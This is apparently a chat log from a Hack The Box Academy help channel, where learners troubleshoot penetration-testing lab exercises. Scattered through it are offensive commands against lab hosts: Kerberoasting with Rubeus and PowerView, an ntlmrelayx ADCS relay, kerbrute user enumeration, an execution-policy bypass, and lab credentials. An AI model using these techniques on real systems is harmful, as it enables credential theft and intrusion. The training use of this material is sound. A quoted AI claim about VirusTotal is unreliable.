hashcat --stdout -a 1 word.wordlist word.wordlist > word_combine.wordlist
- Remove the lines that are less than 12 characters, and then use hashcat as this section did
Your third point isn't actually helpful, since mutating the wordlist is the goal
So mutating can add length
Good catch. So less than about 8 characters, otherwise there are so many too-short lines
I found out the answer.
Here is the hint:
Step 1:
Go to https://www.inlanefreight.com/index.php/contact/
Step 2:
Put your mouse on top of the email address for enterprise@inlanefreight.com
Then you can see the email address on your browser near bottom left corner.
Yo, can anyone tell me if the Kerberos double hop issue is still a thing even when using ligolo, having already routed the internal address to our attacking machine?
Hi everyone, does this image represent 2 distinct forests or one forest with 2 distinct trees?
The section says 2 distinct forests but I don't understand the reason and how to see that
Attacking Common Applications for Splunk and PRTG is very laggy
Does this happen to you guys as well?
anyone?
2 forests
Each domain is its own tree, so dev.inlanefreight.local is its own tree in the inlanefreight forest, dev.freightlogistics.local is its own tree in the freightlogistics forest
Howdy; I can't quite figure out what I'm doing wrong, and despite trying numerous things and googling, I still cannot figure out what the issue is, so hopefully a set of eyes from a knower could help!
I'm working on the File Upload Attacks Skill Assessment, and pretty much right before the end. I managed to upload a malicious svg file to yoink the source code, and from my understanding of the source code, my php file should bypass the mime filter, the white and blacklist, and everything else...but I'm still getting the only images allowed error.
dm me
Deeply unfortunate, we checked and it appears I am doing it correctly however I still seem to be getting the img error; reset of target, payload change, magicbytes change, and still borked hah
Hi guys, can you say if I am on the correct way for MSSQL, Exchange, and SCCM Attacks SA 3rd question
Please DM me, thanks~
A solution was found, bless you @brave field 🙏
Can't solve the Network Enumeration with Nmap, Medium lab question, tried everything
Please someone help me
"After the configurations are transferred to the system, our client wants to know if it is possible to find out our target's DNS server version. Submit the DNS server version of the target as the answer."
(even i have completed the hard one)
Did you look for UDP ports?
yupp
With Version scanning ?
I found port number 53 on UDP, and its service version as "NLnet Labs NSD"
but that's not the answer
I tried -sC, -sV, and some custom scripts
use the --script dns-nsid
Also try on the parrot VM from htb I've heard people who had the same issue for some reasons and fix it by switching VPN file or doing it from HTB VM
ok, let me try on HTB VM with --script dns-nsid
Did it on my own kali VM, no issues. EU server.
run : nmap 10.129.149.23 -T1 -sS -sV -sU -p 53 --script dns-nsid --source-port 53 -v -Pn -n @ HTB VM
It's successful
thanks @hidden ledge and @brave field
But why did it succeed this time, and not on my own Kali machine?
It worked fine on my kali VM
which VPN server? I am on EU 5
eu 3
I don’t know but you are not the only one who had the issue
OK, we can leave it, it's done na... why waste brain power on unnecessary things
Has anyone completed the HTB AI Red Teamer path? I need some guidance regarding that
On the module Windows Event Logs & Finding Evil, on the first one. The first question says: Analyze the event with ID 4624, that took place on 8/3/2022 at 10:23:25. Conduct a similar investigation as outlined in this section and provide the name of the executable responsible for the modification of the auditing settings as your answer. Answer format: TW__.exe
I have connected with RDP and opened Windows Event Viewer. I also found the log on 8/3/2022 at 10:23:2025 but I don't see anything close to the answer format.
Can someone help me please
conduct the investigation as outlined in the reading
you start with the logon event; and follow up
Hello Everyone on the Skills Assessment - SQL Injection Fundamentals I tried all the injection payloads and Nothing is working
hello i need help on Password Attacks Module (Pass the Ticket (PtT) from Linux)
look for other endpoints
Help with skill assessment II of attacking common applications first question : find the URL of the Wordpress instance
Anyone did the Skills Assessment - File Upload Attacks? Correct me if I am wrong, the PNG extension fails the MIME test because it's intentional or is it just me? Thanks.
gobuster, ffuf, plenty of ways to fuzz for vhosts
you'll need to combine techniques
¯\_(ツ)_/¯
also the module is above tier 0, so please avoid spoilers
could be that it just doesn't accept pngs, it's been a minute since i've done it
In the Content-Type header it does; if possible could you try it with the PNG MIME type and let me know in the DM, thanks
i'm not doing sanity checks atm; sorry
Hey, is this where I can ask about a subscription matter?
I am in the Attacking Common Applications skill assessment. I can't find credentials for the third vhost I have discovered. Any help? I tried brute forcing the password and using the default username
issues with subs should be directed to website support, not the discord
Need some help? Learn how to reach the support team on Academy.
Can anyone help me with the module: Windows Attacks & Defense
Page 15
Section: PKI - ESC1
I can't send the file cert.pfx to WS001 because I don't know how ❗️
I'm in Penetration Tester - Attacking common services - Attacking SQL Databases - Question 2. I have logged into the DB as htbdbuser, or MSSQLSVC. It seems neither have the privilege to do anything. So I tried to impersonate. When I run the commands to list users I can impersonate, I get no results. Any idea?
I tried this but no luck after one hour
The one with the username john? on wordpress?
you need to enumerate the users with WPScan
John isn't the user you need to brute force
WHO CAN HELP ME WITH "PKI - ESC1" in CDSA module "Windows Attacks & Defense"? 😐
That's my last question
Anyone
Can someone help me with the "Skills Assessment - WordPress" section of the WordPress module? I don't understand one thing: the exercise states that the public facing website is on WordPress, but in no way can I find anything related to WordPress on that site: no meta, no WordPress related directories, no readme, no license, and subpages are HTML files (which should rather be PHP on WordPress). I also tried IP reverse lookup, even dirbuster, but this didn't help me in any way. Should this look like this? I don't want exercise answers that much, because I want to learn by doing it myself, but I'm questioning whether or not this is expected
Okay, I realized something during writing above
There was info about "Linux DNS mapping" in the module and there actually was one URL that didn't work
I had to add it to /etc/hosts and now I have access to some wordpress blog
Hi all, need to clarify something. how to open an elevated PowerShell ? When using "Run as administrator" I get the following error which sounds weird...
What is the name of the network interface that MTU is set to 1500?
Please help me
Ooooh thank you so much.
Open the alert "[InsightNexus] Admin Login via ManageEngine Web Console." Find the foreign IP address starting with "203" in the comments. Check VirusTotal for the information related to this IP address, and add the details as a comment in this alert. In VirusTotal, what is the name of the file starting with "Mango" in the Files Referring section? So that is the question, but where is the Files Referring Section?
So did they take off the Files Referring section on VirusTotal?
Currently doing Windows Server Update Services (WSUS) on || Compromise the DC01 using WSUS. Submit the flag located at C:\WSUS\flag.txt || Curious on how to force an update on the DC?
Hello there, I am stuck here: Using Julio's hash, perform a Pass the Hash attack, launch a PowerShell console and import Invoke-TheHash to create a reverse shell to the machine you are connected to via RDP (the target machine, DC01, can only connect to MS01). Use the tool nc.exe located in c:\tools to listen for the reverse shell. Once connected to the DC01, read the flag in C:\julio\flag.txt. Can I DM someone? The reverse shell isn't working. I have this message: Command executed with process ID 3684 on DC01. But no reverse shell. I don't know what I am doing wrong
@zinc pumice Please take care not to post content from modules above tier 0, like attack paths etc
Sure, I'll be careful from now on.
Hi, I am doing Getting Started, Knowledge Check question. I used msfconsole and successfully exploited getsimple; my question is I am having difficulty doing privilege escalation, any hints/links to resources would be appreciated. This is my first question, so if I am posting it on the wrong channel, please guide me to the correct one. Thank you for your help 🙂
You found creds, but the password is in hash form. Try to crack it. If successful, then see where these creds can be used.
Hi folks.
I am doing LLMNR/NBT-NS Poisoning - from Linux
There is a question to run hashcat to crack the hash, and submit the cleartext password as your answer.
I ran it on the attacker01 machine, but it gave this error:
error: unknown target CPU 'generic'
* Device #1: Kernel /usr/local/share/hashcat/OpenCL/shared.cl build failed.
I'm using
Pwnbox: SG
US Academy 4
I'm current doing "Attacking Active Directory and NTDS.dit".
I'm trying to find valid usernames.
I have a text file that has usernames using || username-anarchy ||
I'm using ||kerbrute|| with the command
|| kerbrute userenum --dc machine_IP --domain inlanefreight.local gen2.txt ||
I'm getting KDC ERROR wrong realm which means I have the wrong domain.
Note that I only followed the domain used on the module. What could I be doing wrong? What domain should i use?
I also tried using another version with command || kerbrute_linux_amd64 userenum --dc 10.129.12.127 --domain inlanefreight.local gen2.txt ||. Same result
did you add the domain name to /etc/hosts file?
I did not 🤦 It worked now but still hasn't found a valid username. I'll figure that out on my own. Thank you very much.
kerbrute likes FQDNs
Got it now. I'm still apparently using the wrong domain. I ran || nmap scan || and it showed me the right one.
Can anyone help me in the GraphQL attacks module with SQL injection? Can't input the payload right
I've tried it now for 2 days and I can't figure it out.
DM me would be better.
What is the name of the network interface that MTU is set to 1500?
Please help me
lookup "network interfaces"
I guess “eth0” but still saying incorrect answer
Read the whole line of each interface result. You would see the answer
Well, I found out that it's working with a real device but not with an emulator. Both the newest Frida version and the one used in the module do not find the native lib on an emulated device, while it works on a real device
Guys, I have been stuck since yesterday on [Attacking Common Applications Module | Attacking WordPress Section]. I found the username and password for /wp-login.php, but when I use them in msfconsole, it says payload upload failed.
Try using some of the other RCE vulnerabilities. Did you also try just logging in with that user?
Yo guys
I'm on File Uploads - Blacklist Extensions section
I found out the allowed extensions, and I'm trying them one by one, but none seems to be executed by PHP
Keep trying different ones, just because it’s accepted doesn’t mean it will give you shell. There should be different ones that were “accepted”.
Anyone can help on Network Foundations -> Skills Assessment -> Chapter 3. - Target Acquired (OPTIONAL)?
I'm supposed to:
- nmap -p21,80 -sC -sV <target ip>
- nc <target ip> 21
- USER anonymous[Ctrl+V][Enter][Enter]
  PASS anything[Ctrl+V][Enter][Enter]
  PASV[Ctrl+V][Enter][Enter]
- nc -v <target ip> <dynamic port>
On the 4th there's the problem; the last two passive mode numbers are 194 and 13.
The calculation is supposed to be 194*256+13 = 49677, aka the dynamic port, but it doesn't work.
it's supposed to return:
But it returns:
Will a webshell work? Or do I have to upload a PHP reverse shell?
only webshell, reverse shell not possible with IP:PORT exercises
i was planning to use ngrok but np
you can try
i was doing it wrong, yell heah
You need to keep the control channel open.
So nc <target ip> 21
USER anonymous[Ctrl+V][Enter][Enter]
PASS anything[Ctrl+V][Enter][Enter]
PASV[Ctrl+V][Enter][Enter]
Open a new shell (while keeping the control channel open) and connect to the data channel :
nc -v <target ip> <dynamic port>
I'm working through the Penetration Tester course and I'm on "Windows Privilege Escalation: Windows Server". For some reason both xfreerdp and rdesktop (rdesktop -u htb-student -p HTB_@cademy_stdnt! [IP Address]) aren't working. Anyone have any advice? I am using Pwnbox to try and connect. Nothing on the forums is helping either 😕
Yeah so it still doesn't work.
This question was asked several times, many times left unanswered and apparently, some guy stated that you have to be super fast for it to work.
Just tried that and I got a few steps further.
Now I'm supposed to do:
LIST[Ctrl+V][Enter][Enter]
and
RETR[Ctrl + V][Enter][Enter]
which returns invalid number of parameters
You can dm me btw so we can go through this 🙂
I've DM'd you
I am having an issue with getting the VNC password in the skills assessment part of Windows Lateral Movement. I am pretty sure I have to port forward to get where I am going, but I can't find any open ports. Can someone DM me if they can help?
Can anyone provide some assistance with the LLM Output Attacks Skill Assessment?
hi can I ask for help on the skills assessment
Hello, for the Cracking Passwords with Hashcat section on cracking wireless handshakes with hashcat, I'm having a little trouble with hashcat-utils.git. I git clone hashcat-utils, cd into hashcat-utils/src, and when running the make command in the terminal it doesn't really compile anything and returns an error. Apparently it's something about a rule for cap2hccapx.c that it's not able to make a target for. The screenshot will probably help a bit more with what I'm dealing with, but I would definitely like to try and get this working for the module.
square brackets indicate key presses
Hello
still need help with the LLM Output Attacks Skill Assessments if anyone sees this later and is able to help would be very appreciated (ended up solving it. If anyone in the future sees this and needs help feel free to dm me)
i'm stuck on the last part of the skills assessment for the "Introduction to Advanced CSRF & XSS Exploitation" module.
i have identified ||the SQLi, and dumped the table names.||
||the only table that stands out is "files", and when i try dumping stuff in it i keep getting {"error":"Something went wrong"}.||
any help would be massively appreciated
I'm doing the "SQL Injection Fundamentals" skills assessment and I'm kinda losing my mind lmao
I got the first SQLi working fine, then found a second injection point
I managed to:
map the db/tables/columns
confirm the _ table exists
confirm there's a user called 'admin'
but I can't get the answer to
"What is the password hash for the user 'admin'?"
I tried using SUBSTRING(), ASCII(), even a subselect inside a CASE WHEN, but it keeps throwing 500 errors
Am I just making this 10x harder than it needs to be 😅
I need help. I am in AD Trust Attacks, in "SID Filter Bypass (CVE-2020-0665)"; I can't connect to sql02. I did set up proxychains and an SSH -D tunnel?
I've been stuck on the same task -- tried fuzzing the target, doing SQL injections on login and registration -- now running a bit low on ammo 😄 hints are more than welcome
I've been stuck at the part just before you for weeks. I can't get the initial payload to work. I ||found the endpoint||, but I either get nothing back or I get the message you're getting
have you identified the ||SQLi|| or what step are you stuck on exactly?
The module is above tier 0, so be mindful of that or take to dms
how and who should I dm ?
My message was strictly to the person above since they replied to another user asking for help
You'll have to be patient for someone thats done the same module to offer assistance
Like how much patience, hours or days?
the help here is community driven ¯\_(ツ)_/¯
Last time I asked for help, I never got any help for a week and then I moved further to other sections
Higher tier modules are less likely to have someone have completed them (tier 3 and up); if your ask gets buried you can bump it/reask
Last time it got buried or lost
I will bump this time, thank you for your response and guidance 🙂
The ad trust attacks module yeah? I've been slowly setting up the burner to get back into studying
I love all the modules and content so far. I only had problems with lab setups, never had any issue with the attacks. This time also I might be making a very silly mistake
I don't recall the module specifically, but in my notes I never needed to directly connect to SQL02. Your connection problem to it isn't really related to the module contents but instead some network issue preventing you from connecting, or the service you're connecting to isn't open
Yes, we need to set up an SSH dynamic tunnel, then we have to use proxychains to enumerate SQL02. I already added sql02 to my /etc/hosts. Also my tunnel is up but still I am getting this error? "File "/usr/local/lib/python3.11/dist-packages/impacket/nmb.py", line 907, in _setup_connection
raise socket.error("Connection error (%s:%s)" % (peer[0], peer[1]), e)
OSError: [Errno Connection error (172.16.118.11:445)] timed out"
I also checked port 445 through nc, which shows open, but when I did nmap it shows filtered
Again, I don't think so. I didn't do any of that.
can I dm you ?
ok
As an FYI on using Google Threat Intelligence, this is what I was told by AI: that VirusTotal no longer has a file reference anymore. The Relations tab was removed from VirusTotal as part of its migration into Google Threat Intelligence (GTI), which is replacing VirusTotal as a standalone product.
Here's what’s happening and why it matters:
🧠 What Changed and Why
• VirusTotal is being phased out: As of 2025, Google is retiring VirusTotal as a standalone platform and migrating users into Google Threat Intelligence (GTI).
• GTI introduces new features: These include curated threat actor profiles, campaign reports, and a new score for indicators of compromise (IoCs).
• Legacy features like the Relations tab are being deprecated: The Relations tab, which showed connections between files, domains, URLs, and IPs, is no longer available in the GTI interface. This is likely due to GTI’s shift toward curated intelligence rather than raw community-driven data.
Nvm Google Threat Intelligence does not currently offer a direct file referral program like VirusTotal’s legacy public submission and sharing model. However, it provides private scanning and API-based submission workflows for enterprise use.
Here’s how to approach file submission and referral-like workflows in Google Threat Intelligence (GTI), especially if you're transitioning from VirusTotal:
Hi, I’m stuck on NoSQL Injection – Skills Assessment 2 in the CWEE path. I’ve already enumerated the valid username, but I can’t progress any further, none of the three endpoints seem to react to NoSQLi payloads (dot/bracket notation, $ne, $regex, JSON bodies, URL-encoded forms, timing, etc.). Everything returns the same “missing parameter” messages, and I can’t get any vector to trigger different behavior. Could someone give a small hint on what general direction or payload format I should be focusing on next (dot notation, JSON, x-www-form-urlencoded, etc.)? Thanks!
I don't get anything back in the python logs showing ||a successful SQLi||. I'm at the part where I'm trying to figure that out ||using a payload very similar to the one in the module||. I found ||the other endpoint||, so that's what I'm attempting to target.
nice congrats
@tough gorge Please take care not to post content from modules above tier 0. Make sure to state which module/section/question you're on, what you need help with, what you tried etc. If you feel like you need to reveal more info you can ask someone to take it to DM's.
I am doing the module - Active Directory & Attacks, and I'm stuck on the lab for ACL Enumeration. I need to use PowerView.ps1, but whenever I try to run it, all I get are errors. I've reset the machine three times, and I've also downloaded a fresh copy of PowerView.ps1. I've never encountered these problems before. I even used powershell -ep bypass -nop -c, but even though I don't get any output, when I run a PowerView command, then I get errors again.
Have you researched the error to see if others have had the same error and what they have done to fix it?
I'd like to ask whose idea it was to put || Pivoting tunneling || technique in Password attack assessment when that topic is 2 modules after Password attacks? What's the thought process on that?
where'd they do that?
the ptt from linux section?
the section shows you what to do, you don't really need the whole pivoting module
i was wondering if someone could explain why on case 8 of sqlmap fundamentals in the instructions it has --csrf-token="token" as the command but it does not work, but it works when you use --csrf-token="t0ken". i don't know if this is a spoiler or not or a mistake in the command
sqlmap version 1.9.11.3#dev
It says right there on the page, a non-standard token name is used
it's just the name of the parameter for the token
it is by design
Hello everyone
I tried to solve the question which is related to wayback machine in the web edition section of penetration tester path. The question is about paypal.com. The answer should be Palm Organizer according to wayback machine result but it didn't accept that answer
Can u help me please?
@cloud urchin i dont see where it says those words or maybe am half asleep lol
if you visit the website on the target you spawn it says at the top
so it does, i think i just didn't quite understand why i did it lol, thanks for the explanation bro
It is case sensitive i think, also remove the tm from it when copying
I removed it but didn't work
Did you copy it from the wayback machine itself?
Yeap
Weird. It should work then
@fathom pendant Hi, am I allowed to talk about the issue? cause the thing is I've tried one method and it worked back then but somehow when I tried to do it again I'm getting errors for some reason
Hello could some give me a little nudge for the AD Enum & Attack skill assessment II for this question: Submit the contents of the flag.txt file on the Administrator Desktop on the MS01 host.
I'm system on SQL01 but can't pivot on MS01 with hashes I dumped 🙁
I'd enumerate the users using their creds you've harvested from SQL01.
Didnt find creds on SQL01 yet i'll try again
When I say creds, that can be cleartext, NTLM hashes, etc.
Well I dumped local hashes and looked for creds with Lazagne,snaffler and manually but didn't succeed
Hashes seems useless in order to pivot
I'll try responder
You can send me a DM
Can anybody share their AD Enum notes? I feel like mine is disorganised af
Hi, can help with signature wrapping attack for SAML?
Yes I logged in with the user, I got to the admin panel, tried injecting php get code in the 404 page, no luck. I am still stuck.
anybody doing eighteen machine?? im hard stuck at the very beginning trying to enumerate the db... did the impersonate to that user and tried some stuff but nothing
make your own, you'd benefit more that way
redo if you need to
hello
can someone assist me with the Phishing in the xss module? the payload works just fine and i can intercept the tested creds but however i encode the script it always says url invalid
https://academy.hackthebox.com/module/289/section/3236
The network concepts is so long, and i need to read all this?
these concepts are the foundations of every other network thing you run into; this is stuff that you'd learn in any college with a Tech/IT focus

The OSI and TCP/IP stacks are core to understanding how certain components interact
like is the tunnel acting at layer 4 or layer 3; does its operating at a different layer impact its functionality and capabilities
comprehension >>>>> speed
your skills fall apart if you build them on a shaky foundation
the stronger your foundation, the less you have to go back and 'relearn' things that you should have learned first
I still need helppppp
What's the usual solution to this? I'm doing pass the hash exercise from Password attacks. I reconnected multiple times, spawned target multiple times as well. Even set mtu to 1200, reconnect VPN... Still the same issue. SOLVED: changed VPN file
heyy fellas
I am stuck at linux privilege escalation skill assessment Flag2
I am little stuck and I need a little nudge.
im new here, and cant really help you, but based on previous experience with asking for programming help, people might appreciate some more info. in the interest of saving more experienced people's time, what have you tried, and whats your approach? (remember, i just joined this server today, but the people who will be able to help you would appreciate this info, im sure 🙂 )
Stuck here can anyone can explain
Ok guys, this might be a dumb question, but where can I view all modules that I've "favourited" i.e. clicked the heart icon on? I'm about to start the Getting Started module in the Penetration Tester career path, and have "favourited" all the modules I'm lacking prior knowledge on which are listed as prerequisite for this one, from the description. I'd like to work through those first.
Also, separate question, also possibly dumb/due to my non-understanding of the way the platform works, but I started the career path with 120 cubes, and was under the understanding that completing a module gives back all the cubes needed to unlock it, however I now have only 80 cubes. Could anyone please shed some light on these questions?
Thanks!
Completing the module gives 10% of the cubes back I think
i think tier 0 costs 10 to unlock and you get them all back, but not the higher modules
Are the modules in the career paths not all free?
no, most aren't
Ahh ok, how can I distinguish the free from non-free? Not that it will affect what I try to complete, but so i can more effectively plan buying the cubes needed
actually i think you get 20% not 10% of higher tiers
tier 0 is "free", costs 10 cubes, gives 10 cubes back
anything above that is like 20% return on cubes
ahhh i see. the Penetration Testing Process module is T1 but the next one, Getting Started, is T0, so that's where I got confused. I had it in my mind that modules would follow an ascending Tier progression as you progress through a path. Thanks!
Do you happen to also know where I can find the favourited modules?
idk
20%
Ive done the monster math on it a bit
I need help with this module's question. I've tried everything and even asked the AI, but I still can't solve it.
https://academy.hackthebox.com/module/21/section/128
For linux priv esc special permissions, the answer seems to be buggy.
This file should work for both answers because the setuid and setgid bits are set
I solved it and found the other two binaries, but that was a bit annoying
You're likely off-by-one
What steps did you take to "run powerview.ps1"?
try importing it first then running a cmdlet
Is that how I was supposed to do this and I'm misunderstanding, or was this a bypass thing?
PS C:\Users\htb-student\Downloads> Import-Module .\PowerView.ps1
Import-Module : File C:\Users\htb-student\Downloads\PowerView.ps1 cannot be loaded. The file
C:\Users\htb-student\Downloads\PowerView.ps1 is not digitally signed. You cannot run this script on the current
system. For more information about running scripts and setting execution policy, see about_Execution_Policies at
https:/go.microsoft.com/fwlink/?LinkID=135170.
At line:1 char:1
+ Import-Module .\PowerView.ps1
+ ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
+ CategoryInfo : SecurityError: (:) [Import-Module], PSSecurityException
+ FullyQualifiedErrorId : UnauthorizedAccess,Microsoft.PowerShell.Commands.ImportModuleCommand
Hello all
Active directory enumeration: DCSync attack , i'm stuck there.
I tried secretsdump.py with adunn credentials to dump hashes but it doesn't work.
I also connected to ACADEMY-EA-MS01 using xfreerdp and tried to make a DCSync attack with mimikatz, but it still doesn't work.
The question is unclear for me.
Someone to help?
You still need to use execution bypass
Okay, this finally got it to work: Set-ExecutionPolicy Bypass -Scope Process -Force; Import-Module 'C:\Users\htb-student\Downloads\PowerView.ps1' But why was this necessary? Why can't you just transfer over PowerView.ps1 and run it like normal?
Importing it is normal. You're importing all the cmdlets so you can run them.
It's not a standalone script you just run, you use the cmdlets it has
Did you get a command prompt as adunn using runas??
Introduction to Windows Evasion Techniques: Open-Source Software
i tried to manipulate CorExeMain and mscoree.dll but it doesn't work
Guys, what am I missing there? Web Proxy>Burp Intruder section
You have a typo
ahh no!
Let me try it
Make sure you have url encoding off Kemal
.
Uh
No it doesn't work
@obsidian meteor @hidden ledge please remove those flags
That is a tier 1 module
Read the channel subject
Sorry
Sorry
Didn't pay attention
Sorry had no intention of showing flags i didnt know about it
No worries
Hi, I am having a problem with DACL Attacks II > SPN Jacking (https://academy.hackthebox.com/module/255/section/2911). There is a point in which we have to create a ticket with rubeus using the credentials of the target machine (SRV01$ and its NTLM hash), but it is not said how they got those creds. We have to do the same for another machine, but I don't know how to get its hash. Can anyone help me?
I also feel I am missing something silly
I'm working on "Kerberoasting - from Windows" exercises which is to crack the certain spn account. I'm wondering why rubeus and powerview command give different hash. I was able to crack the hash provided by rubeus but the powerview one is throwing error when trying to crack them using hashcat.
Powerview:
PS C:\Tools> Get-DomainUser -Identity svc_xxx | Get-DomainSPNTicket -Format Hashcat
Rubeus:
PS C:\Tools> .\Rubeus.exe kerberoast /tgtdeleg /user:svc_xxx /nowrap
Hello Everyone, I am in the CPTS course topic: Pivoting, Tunneling, and Port Forwarding, under Dynamic Port Forwarding with SSH and SOCKS Tunneling, where you are expected to perform RDP through proxychains into the victim machine (the last question in the section). If all the steps are followed as per the dynamic port forward, the nmap results show no ports found as they are filtered. I was able to connect to the system directly through proxychains, but my question is, how to go about it if the port is filtered and not showing up in the scan?
ok many things wrong... I don't need the hash of the target machine, but the hash of the machine on which I am local admin. Can be done via mimikatz started from a powershell run as admin...
If you copied the output from the terminal running PowerView, it likely has spaces.
^ if you look closely at the image I shared, the two hashes are different. The 1st one starts 09F and ends 417D, while the powerview one starts 7E8 and ends 70C1
I think the hashes captured during Kerberoasting appear different each time due to dynamic ticket data, but they were all encrypted using the exact same password-derived key. This allows any of the unique hashes to be successfully cracked back to the single, consistent password.
Yeah that's indeed correct. I'm just wondering why Rubeus and powerview produce different results.
Well nevermind. I reset the lab and did it again. Right now in my current test I am getting the same result for both tools.
This is the SIEM Visualization Development module, the SIEM Visualization Example 4: Users Added Or Removed From A Local Group (Within A Specific Timeframe) section. I added the row @timestamp to get the "common date," but it's saying that my answer is wrong. I am not sure what I am doing wrong here, is it that @timestamp not what I think it is or what?
this view shows week of, not day
I don't get it, are you referring to this?
I just changed it to "days" and refreshed, but the table's results did not change
Well, this is weird. I changed the "Absolute" dates on the calendar from Mar 1 -> now to Mar 1 -> Mar 31 and that obtained a new value
The new value got accepted, but I have no idea why a new value was obtained in the table to begin with
Its silly
hi everyone, can someone help me with the last question of Pass the Certificate (a lesson in Password Attack module). i keep encountering the same issue with impacket-ntlmrelayx -t http://10.129.234.172/certsrv/certfnsh.asp --adcs -smb2support --template DomainController after i ran printerbug.py to authenticate against my kali machine
[*] GOT CERTIFICATE! ID 19
Exception in thread Thread-6:
Traceback (most recent call last):
File "/usr/lib/python3.13/threading.py", line 1043, in _bootstrap_inner
self.run()
....
I used --template KerberosAuthentication and it worked fine
Hi! I can't connect to machine https://academy.hackthebox.com/module/176/section/1780 with the password given at the end of the page..
I was still connected yesterday correctly
Why?
ow thanks, it worked. But why?
Also found the file as ?.html but ../admin/?.html or ../admin/%3F.html doesn't give me anything
(Footprinting lab - hard) i UDP scanned the box and got SNMP, and version scan said “SNMPv3” but it still uses community strings??
But I thought only SNMPv2c uses community strings?
Don't take nmaps result as gospel.
Also that module is above tier 0 from what I recall, so the solution shouldn't even be posted anywhere
Yes
How was I supposed to know it isn’t really version 3🤨?
It's also mentioned in the reading that devices may use v2 strings as they transition to v3
Lemme check
Actually it says “many organizations are still using SNMPv2, as the transition to SNMPv3 …”
Wait did you just remember that or you went to check that section?
guys plz i need help api attacks skill assessment even when i upload a pdf file i still get the same error i tried different sizes but same error
I help often enough that its just there
hello
Hello everybody! I can't find the target ip in the Incident Handling Process course, in the Cyber Kill Chain module. Can you help me?
Look just above the questions for a "spawn target" button, [not the spawn instance button]
Btw, its incident handling process module, cyber kill chain section
plz help me i tried everything i dont know why its not working
I'm blind, thanks.
Np
I spent 2 hours searching for this button 🤣
i succeeded, fck, one detail it was important to take care of
gonna break out in any minute
Hi i am unable to figure out this question of the "Reversing Hybrid applications" section of the "Android Static analysis" module.
Any nudge for the same?
Hi. I'm stuck on the Skills Assessment for the Session Security module. I've managed to get the session identifier for the superadmin but the 'change-visibility' call is returning a 401 unauthorized - i can't tell if this is expected or if something went wrong on the challenge itself
Any direction would be appreciated.
I'm having an issue with connecting via RDP to the provided VM in "Windows Attack & Defense - Kerberoasting" module/section.
└─$ xfreerdp /v:10.129.194.237 /d:eagle /u:bob /p:Slavi123 /dynamic-resolution
[14:08:58:053] [49877:49878] [WARN][com.freerdp.crypto] - Certificate verification failure 'self-signed certificate (18)' at stack position 0
[14:08:58:053] [49877:49878] [WARN][com.freerdp.crypto] - CN = WS001.eagle.local
[14:08:58:255] [49877:49878] [WARN][com.freerdp.core.nla] - SPNEGO received NTSTATUS: STATUS_TRUSTED_RELATIONSHIP_FAILURE [0xC000018D] from server
[14:08:58:255] [49877:49878] [ERROR][com.freerdp.core.nla] - SPNEGO failed with NTSTATUS: STATUS_TRUSTED_RELATIONSHIP_FAILURE [0xC000018D]
[14:08:58:255] [49877:49878] [ERROR][com.freerdp.core] - nla_recv_pdu:freerdp_set_last_error_ex ERRCONNECT_AUTHENTICATION_FAILED [0x00020009]
[14:08:58:255] [49877:49878] [ERROR][com.freerdp.core.rdp] - rdp_recv_callback: CONNECTION_STATE_NLA - nla_recv_pdu() fail
[14:08:58:255] [49877:49878] [ERROR][com.freerdp.core.transport] - transport_check_fds: transport->ReceiveCallback() - -1
Anyone available to help?
I've restarted the VM several times too. I've also tried xfreerdp /v:10.129.194.237 /u:eagle\\bob /p:Slavi123 /dynamic-resolution
for incident handling process module's skills assessment question 1, I found the IP address in the comment in the alert. I am trying to navigate to that IP address but the page will never load. I tried it with http not https because https obviously isn't gonna work
can someone help me out?
in fact the connection loads out
Hi noob here, I ssh onto the win machine PS console, I put in Get-ADUser but when I want to type -Filter or -anything, what I type after goes invisible
I need help with this module's question. I've tried everything and even asked the AI, but I still can't solve it.
https://academy.hackthebox.com/module/21/section/128
I answered this yesterday, you have an off-by-one error. It's not expecting users to do ||${#var}||
hi I asked several hours ago with the skills assessment and someone in DMs tried to help me but they can't find the answer either. is anyone who has done CDSA available for DM?
I asked here in #modules many times
I'm wondering what I should do at this point
I literally completed the first module, and then the second one and then they added the skills assessment to first module
so need to complete
what do you recommend I do?
should I just go onto the next module and come back to it later?
hi has anyone done the skills assessment for the incident handling process?
and if so can I get help with it?
The question doesn't say to navigate to the IP. The question says to look it up on VT.
I did
but it gave no results
on VT
VT had nothing on the IP
I also tried multiple other things
I also don't have the file
actually I looked it up in VT first, THEN tried navigating to the IP as a backup
neither worked
not that navigating to the IP was smart but I thought someone else in this chat had done it so I tried to do it
Then you have the wrong IP, I checked myself it's all there
@rustic sage Please take care not to post content from the modules above tier 0, especially skill assessments. Your post had the IP of a machine you have to pivot to.
It sounds like you're really not reading and understanding what the question wants of you. It says to go to VT and then to a certain section of VT. It works if you have the right IP. Make sure you read the whole question, slowly, to make sure you do every part of what it asks.
Is there an issue with the Active Directory DCSync module when trying to RDP into the Attack Host? I am unable to RDP / SSH into the box to actually work through the questions.
I haven't heard anyone say anything recently, maybe try changing servers or regions, also don't use the pwnbox and VPN at the same time if you're doing that.
I will try to change regions, I tried through VPN first thinking it was my kali box, then tried over on the PWNBOX and still had no luck.
I keep on getting the following error when trying to RDP into the attack host. I also try to SSH and says authentication failed.
this is after I have switched regions and VPN Servers.
dm please
The 203.x.x.x IP is the wrong one?
Sorry I was trying not to spoil so I used Xs
But that one is wrong one?
Hold on wait let me try something else tonight
When I get back from boxing
I think I know what I’m doing wrong. Silly me
If so I was asking a very silly question
No, that's the one the question asks for, but if you're saying nothing comes up in VT with it then you have the wrong one, because the right one works.
but that's the one I tried was that one
so I'm about to try something else tho
with that same IP
I think I see what I'm doing wrong here
wait solved
thanks
Did you solve it?
https://academy.hackthebox.com/beta/module/221/section/2676
Android Static - Reversing Shared Objects.
What did I do wrong here?
lol figured it out. So stupid, need to do careful reading.
Same problem. Did you resolve it? I tried to change the port the server is running on and map the ssh accordingly to port 9090 and start debugging. However, debugging won't break when entering localhost:9090, the UI is returned normally though. Appreciate any help, I've been stuck at this for half a day now 🥲
uh can anyone help ," What is the difference between the two numbers of the learning progress mentioned above?"
Hello.. I'm stuck in the SQLi Fundamentals module's skills assessment :(
It's ridiculous how I tried everything and no payload worked 👍 no spoil just wanna know if somebody just solved it recently
Module: DACL Attacks II
Section: Skills Assessment
Question: Compromise DC04 and read the flag located at C:\Users\Administrator\Desktop\flag.txt
I have no Idea how to get to DC04.
I have access to || tangui || user but I do not know how am I supposed to reach DC04.
I've literally abused every single technique taught in the module to reach where I currently am, except for sAMAccountName spoofing since the DC is not vulnerable.
What else there is to try? can someone help please?
Take a look at GPO attacks
